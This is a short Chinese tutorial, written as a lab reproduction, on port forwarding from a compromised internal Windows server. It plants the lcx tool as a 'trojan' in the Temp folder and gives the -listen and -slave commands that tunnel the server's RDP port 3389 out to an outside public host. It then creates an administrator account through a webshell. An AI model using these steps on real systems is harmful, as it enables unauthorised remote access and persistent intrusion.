端口转发

端口转发（复现）

0x00 前期准备

1.环境准备：

端口转发的目的是，和一个未开启3389端口的内网服务器远程连接。所以我们需要准备的是一台内网服务器，和一台公网服务器。

2.条件准备

想要进行端口转发，首先我们要先知道这台内网服务器远程连接的端口是哪个。

利用代码：

tasklist /svc

找到其中的TermService这一项，并且记住前面的数字。

接下来，我们就需要通过这串数字来告诉我们，这台内网服务器远程连接的端口是什么。

利用代码：

netstat -ano | find "1604"

到这一步，我们前期需要做的准备就已经完成了。

0x01 端口转发

1.植入木马

帮助我们完成端口转发的木马，我们需要分别将其放入到公网服务器，和上传到内网服务器中。

公网服务器可以随意的选择你想放的地方，但是内网服务器，建议将文件上传到windows目录下的Temp文件夹里。

因为这个文件夹默认是具有读写权限的。

2.监听公网服务器的端口

首先，我们需要先在公网服务器上运行木马，并且监听本机的两个端口。

这两个端口就是我们之后将内网的3389转发出来之后，用到连接的端口。

利用代码：

lcx

当看到这一幕的时候，木马就已经开始运行了，接下来，我们要监听本机的1996端口，到2019端口上去。

利用代码：

lcx -listen 1996 2019

做完了这一步，我们需要做的工作，就很简单了。

启动我们已经植入到内网服务器上的木马，将内网的3389端口转发到我们外网的1996端口。

利用代码：

C:/windows/Temp/lcx.exe -slave 公网网址 1996 127.0.0.1 3389

执行到这一步，如果看到公网服务器中的cmd多出如下的字符，则证明端口转发已经成功。

接下来，我们在公网服务器上，就可以通过127.0.0.1:2019端口和内网服务器建立远程连接了。

这个时候，我们可以再在内网服务器上利用webshell创建一个管理员组的用户，就可以登录了。

{{uploading-image-346617.png(uploading...)}}

到此，端口转发就已经完成了。